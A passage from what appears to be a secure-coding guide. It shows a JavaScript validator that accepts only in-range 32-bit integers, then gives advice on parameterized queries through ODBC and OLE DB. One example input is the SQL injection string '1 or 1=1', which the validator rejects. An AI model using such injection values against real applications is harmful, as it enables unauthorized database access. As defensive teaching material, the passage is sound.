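  if (typeof input !== "string" || !/^-?[0-9]{1,10}$/.test(input)) {
    return null;
  }
  const n = Number(input);
  return n >= INT4_MIN && n <= INT4_MAX ? n : null;
}

console.log(toInt4("42"));         // 42
console.log(toInt4("2147483648")); // null: out of range
console.log(toInt4("1 or 1=1"));   // null: not a number
```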

If your Web application uses open database connectivity (ODBC) and you want to use parameters, you need to use the SQLNumParams and SQLBindParam functions. If you use OLE DB, you can use the ICommandWithParameters interface.